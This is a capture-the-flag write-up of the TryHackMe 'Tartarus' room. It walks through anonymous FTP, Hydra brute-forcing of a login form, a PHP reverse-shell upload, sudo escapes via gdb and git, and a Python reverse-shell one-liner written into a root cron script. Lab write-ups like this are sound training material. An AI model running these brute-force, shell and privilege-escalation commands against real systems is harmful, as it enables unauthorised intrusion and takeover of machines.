Tartarus — TryHackMe — Writeup
Hello. I’m Rahmos. Here is my Tartarus — TryHackMe — WriteUp. Check it out!
First, deploy the machine and scan for opened ports
First login to its FTP as anonymous and read the file test.txt
get test.txt -
Specify the symbol “-” so that you can read it directly without download to your machine.
Well, nothing interesting. Let’s cd to another folder.
It’s quite complicated! So remember to cd to the exact directory. Get the txt file.
We’ve got another hidden dir. Let’s access it.
It’s a login page. We don’t know the credentials yet.
So let’s try to find others hidden dir using dirbuster.
Let’s read the robots.txt file.
So maybe d4rckh is our username! Let’s try it later. Also we see a directory /admin-dir. Access it.
Get both 2 of these files for bruteforce using wget.
I named the files userfile and passfile. You can name them whatever you want.
Let’s login using d4rckh and random password.
I got the incorrect username response. Now bruteforce the username using hydra.
hydra -L userfile -p test <ip> http-post-form “/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:Incorrect username “ -I
*remember to change the userfile and passfile to your files’ name.
After a while I got the correct username: enox. Try to login with enox and a random password.
Now let’s brute the password.
hydra -l enox -P passfile <ip> http-post-form “/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:Incorrect password!”
Now let’s login.
Let’s upload our php-reverse-shell.
However, I don’t know where the file is uploaded to, so I’ll use dirbuster to look for hidden dirs.
So it will be uploaded in /images/uploads.
Start a listener using nc
nc -lvnp <port>
Access this dir and we will get our shell!
cd to home and get our 1st flag.
Now try to get root. First spawn a tty shell using python:
python -c ‘import pty; pty.spawn(“/bin/bash”)’
Now sudo -l to see which cmd we can run as root.
So we can run gdb as thirtytwo without password needed.
sudo -u thirtytwo /var/www/gdb -nx -ex ‘!sh’ -ex quit
Now we are thirtytwo.
Again sudo -l for thirtytwo
We can run git as d4rckh
sudo -u d4rckh /usr/bin/git -p help config
Now we are d4rckh. We cannot run sudo -l as it asked for a password. Let’s try another way by modifying the python file cleanup.py in /home/d4rckh.
echo ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“<host-ip>”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’ > cleanup.py
You can find your host ip by accessing 10.10.10.10.
This script will spawn a reverse shell at port 1234. So start a listener in our machine.
nc -lvnp 1234
this cleanup.py will automatically executed every 2 minutes as root, as stated in /etc/crontab file
So just wait 2 mins and we will have our shell as root!
Get our root.txt flag